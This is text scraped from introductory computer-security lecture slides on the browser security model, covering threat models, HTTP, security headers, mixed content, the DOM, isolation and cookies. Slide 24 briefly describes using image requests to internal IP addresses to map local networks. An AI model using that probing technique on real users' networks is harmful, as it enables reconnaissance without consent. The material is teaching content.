CSCI-UA.9480 Introduction to Computer Security Session 4.1 Browser - - PowerPoint PPT Presentation

csci ua 9480 introduction to computer security
SMART_READER_LITE
LIVE PREVIEW

CSCI-UA.9480 Introduction to Computer Security Session 4.1 Browser - - PowerPoint PPT Presentation

Feb 15, 2023 220 likes •523 views

CSCI-UA.9480 Introduction to Computer Security Session 4.1 Browser Security Model Prof. Nadim Kobeissi Defining 4.1a Browser Security Goals Also before we start: Practical Assignment 2 is now online . 2 CSCI-UA.9480: Introduction to

slide-1
SLIDE 1

CSCI-UA.9480 Introduction to Computer Security

Session 4.1

Browser Security Model

  • Prof. Nadim Kobeissi
slide-2
SLIDE 2

Defining Browser Security Goals

Also before we start: Practical Assignment 2 is now online.

2 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

4.1a

slide-3
SLIDE 3

Browser security goals.

  • Confidentiality: information on your device
is not put at risk simply by browsing the web.
  • Integrity: Different websites are managed
through different sessions in isolation. More far-reaching goals could include imbuing web applications with the same security as desktop applications. 3 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi
slide-4
SLIDE 4

Can web apps be as trustworthy as local apps?

Example: ProtonMail.
  • ProtonMail ensures security guarantees
through TLS and client-side encryption.
  • However, a malicious ProtonMail host
server can imperceptibly modify code for select sessions. This is very different from desktop and mobile applications, which have signing and versioning. 4 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

VS

slide-5
SLIDE 5

Browser security threat model.

5 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi Browser Alice Internet Server google.com
slide-6
SLIDE 6

Browser security threats: web attacker.

6 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi Browser Alice Internet Server gooogle.com
slide-7
SLIDE 7

Browser security threats: web attacker.

7 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi Browser Alice Internet Server Log into apple- icloud.com to reset your password!
slide-8
SLIDE 8

Browser security threats: network attacker.

8 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi Browser Alice Internet Server google.com
slide-9
SLIDE 9

Browser security threats: software attacker.

9 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi Browser Alice Internet Server google.com XSS? RCE?
slide-10
SLIDE 10

Browser security threats: software attacker.

10 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi Browser Alice Internet Server google.com Open this attachment which contains exploit code your latest bill!
slide-11
SLIDE 11

Comparing different attackers.

Web attacker.
  • Controls their own website, for which they
can get SSL certificates, etc.
  • User is misled into visiting the attacker’s
  • website. Fundamentally an authentication
issue. Network attacker.
  • Passive eavesdropping or active traffic
  • modification. Offset by TLS.
11 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi Software attacker.
  • Actually finds bugs, tries to run code via
XSS, maybe pop a shell…
slide-12
SLIDE 12

Comparing different attackers.

Software attacker.
  • Actually finds bugs, tries to
run code via XSS, maybe pop a shell…
  • Cross-site scripting (XSS):
inject code into a page that is later executed by a separate client the attacker does not
  • control. (Can you come up
with XSS scenarios?) 12 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi
slide-13
SLIDE 13

Browser security goals.

  • Confidentiality: information on your device
is not put at risk simply by browsing the web.
  • Integrity: Different websites are managed
through different sessions in isolation. 13 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi
slide-14
SLIDE 14

Browser Security Mechanisms

14 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

4.1b

slide-15
SLIDE 15

Browser security mechanisms to cover.

  • HTTP.
  • Rendering Content.
  • Isolation.
  • Communication.
  • Security User Interface.
  • Cookies.
Many more mechanisms exist. It’s impossible to cover them all. 15 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi
slide-16
SLIDE 16

URIs.

16 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

https://facebook.com/login.php?target=newsFeed#latest

slide-17
SLIDE 17

URIs.

17 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

https://facebook.com/login.php?target=newsFeed#latest

Protocol Hostname (can include port) Path Query Fragment Encrypted if using HTTPS Not sent to server (except if explicitly using JS)
slide-18
SLIDE 18

HTTP.

18 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi POST /login HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Host: www.nyu.edu Content-Type: application/x-www-form- urlencoded Content-Length: length Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive username=bob&password=logmein23 GET /index.html HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Host: www.nyu.edu Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive
slide-19
SLIDE 19

HTTP.

19 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi HTTP/1.1 200 OK Date: Mon, 27 Jul 2018 12:28:53 GMT Server: Apache/2.2.14 (Win32) Last-Modified: Wed, 22 Jul 2018 19:15:56 GMT Content-Length: 88 Content-Type: text/html Connection: Closed <html> <body> <h1>Hello, World!</h1> </body> </html>
slide-20
SLIDE 20

Examples of HTTP headers related to security.

20 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi Strict-Transport-Security: max- age=<expirationtime>; includeSubDomains Content-Security-Policy: <directive> X-Frame-Options: DENY
  • Hypertext Strict Transport Security (HSTS):
Instructs the browser to only accept HTTPS connections from this domain for the next specified period of time.
  • Content Security Policy (CSP): Disable
dangerous JavaScript and CSS features, prevent loading content from unspecified resource addresses.
  • X-Frame-Options: Prevent this page from
being loaded in an iframe on other websites.
slide-21
SLIDE 21

HTTPS and mixed content.

21 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi
  • Even if an entire website is loaded using
HTTPS, a single resource being served over HTTP can give the attacker leverage.
  • Especially if it’s executed.
<html> <head> <title>NYU</title> <script type=“application/javascript” src=https://resources.nyu.edu/login.js></scri pt> <script type=“application/javascript” src=http://jquerycdn.com/jquery.js></script> </head> <body> </body> </html>
slide-22
SLIDE 22

Rendering content.

  • Browsers will load content (HTML, XML,
CSS) and subsequently render it into the Document Object Model (DOM).
  • Elements within the DOM can contain
content, can have properties and can even trigger events handled by JavaScript code.
  • JavaScript is, of course, not rendered but
executed. 22 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi Element: <head> Element: <body> Element: <title> Text: "My title" Element: <h1> Text: "A heading" Element: <a> Text: "Link text"

DOM

Document Object Model document Attribut: href Root element: <html>
slide-23
SLIDE 23

Rendering content.

  • Elements in the DOM have methods (like in
OO programming): document.write(), etc.
  • In many ways, the DOM is adjacent to the
Browser Object Model (BOM): window, document, history, navigation… 23 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi Element: <head> Element: <body> Element: <title> Text: "My title" Element: <h1> Text: "A heading" Element: <a> Text: "Link text"

DOM

Document Object Model document Attribut: href Root element: <html>
slide-24
SLIDE 24

Using JavaScript to learn local information.

  • Example: Request images from internal IP
addresses
  • <img src=“192.168.0.4:8080”/>
  • Use timeout/onError to determine
success/failure.
  • Create a map/fingerprint of local systems.
24 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi Element: <head> Element: <body> Element: <title> Text: "My title" Element: <h1> Text: "A heading" Element: <a> Text: "Link text"

DOM

Document Object Model document Attribut: href Root element: <html>
slide-25
SLIDE 25

Isolation and Communication.

  • Iframes: Split a page into separate isolated
segments, each with their own namespace.
  • Windows and their frames may interact
through a restricted API: window.postMessage 25 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi
slide-26
SLIDE 26

Security User Interface.

  • Users need to check for many markers:
  • Is the site using TLS?
  • Is the URL accurate?
  • Extended validation sometimes helps.
  • Users can still be misled by a padlock.jpg.
26 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi
slide-27
SLIDE 27

Cookies.

Cookies act as session identifiers or key-value stores between the web client and web server.
  • Once the client logs in, the server may issue
them a secret session cookie that they both then keep track of.
  • Secure cookies are sent only over HTTPS.
  • httpOnly cookies can be sent over HTTP or
HTTPS (misleading name) but cannot be accessed by JavaScript via document.cookies. 27 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi Set-Cookie: NAME=VALUE domain= expires= secure= POST
slide-28
SLIDE 28

Next time: Web Application Security

Review this learning tool for next time! https://unescape-room.jobertabma.nl

28 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

4.2